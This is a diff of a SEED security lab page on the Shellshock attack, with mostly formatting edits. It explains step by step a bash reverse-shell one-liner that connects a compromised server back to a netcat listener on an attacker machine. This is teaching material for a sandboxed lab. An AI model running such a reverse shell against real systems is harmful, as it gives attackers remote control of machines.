CloudLabs-MOC/CloudLabs-SEED/Web Security/Shellshock Attack/Shellshock-Attack.md

 inet **10.0.2.5** netmask 255.255.255.0 broadcast 10.0.2.
 ...
 ```
-The abov enc command will block, waiting for a connection.
+The above _nc_ command will block, waiting for a connection.
 We now directly run the following bash
-program on the Server machine (10.0.2.5) to emulate what attackers would run after compromising the
+program on the Server machine _(10.0.2.5)_ to emulate what attackers would run after compromising the
 server via the Shellshock attack.
 This bash command will trigger a TCP connection to the attacker machine’s
 port 9090, and a reverse shell will be created.
 We can see the shell prompt from the above result, indicating
-that the shell is running on the Server machine; we can type the ifconfig command to verify that the IP
+that the shell is running on the Server machine; we can type the _ifconfig_ command to verify that the IP
-address is indeed 10.0.2.5, the one belonging to the Server machine.
+address is indeed _10.0.2.5,_ the one belonging to the Server machine.
 Here is the bash command:
 ```
 Server(10.0.2.5):$ /bin/bash -i > /dev/tcp/10.0.2.6/9090 0<&1 2>&
 ```
 The above command represents the one that would normally be executed on a compromised server.
 It is
 quite complicated, and we give a detailed explanation in the following:

-- "/bin/bash -i": The option i stands for interactive, meaning that the shell must be interactive
+- _"/bin/bash -i":_ The option i stands for interactive, meaning that the shell must be interactive
     (must provide a shell prompt).
-- "> /dev/tcp/10.0.2.6/9090": This causes the output device (stdout) of the shell to be
+-_ "> /dev/tcp/10.0.2.6/9090":_ This causes the output device (stdout) of the shell to be
     redirected to the TCP connection to 10.0.2.6’s port 9090.
 In Unix systems,stdout’s file
     descriptor is 1.
-- "0<&1": File descriptor 0 represents the standard input device (stdin).
+- _"0<&1":_ File descriptor 0 represents the standard input device (stdin).
 This option tells the system
     to use the standard output device as the stardard input device.
 Sincestdoutis already redirected to
     the TCP connection, this option basically indicates that the shell program will get its input from the
     same TCP connection.
-- "2>&1": File descriptor 2 represents the standard error stderr.
+-_ "2>&1":_ File descriptor 2 represents the standard error stderr.
 This causes the error output to be
     redirected tostdout, which is the TCP connection.

-In summary, the command "/bin/bash -i > /dev/tcp/10.0.2.6/9090 0<&1 2>&1" starts
+In summary, the command_ "/bin/bash -i > /dev/tcp/10.0.2.6/9090 0<&1 2>&1"_ starts
 a bashshell on the server machine, with its input coming from a TCP connection, and output going to the
 same TCP connection.
-In our experiment, when the bashshell command is executed on 10.0.2.5, it
+In our experiment, when the bashshell command is executed on _10.0.2.5_, it
-connects back to the netcat process started on10.0.2.6.
-This is confirmed via the "Connection
+connects back to the netcat process started on_ 10.0.2.6._ This is confirmed via the _"Connection
-from 10.0.2.5 ..." message displayed by netcat.
+from 10.0.2.5 ..."_ message displayed by _netcat._

 ## 5 Submission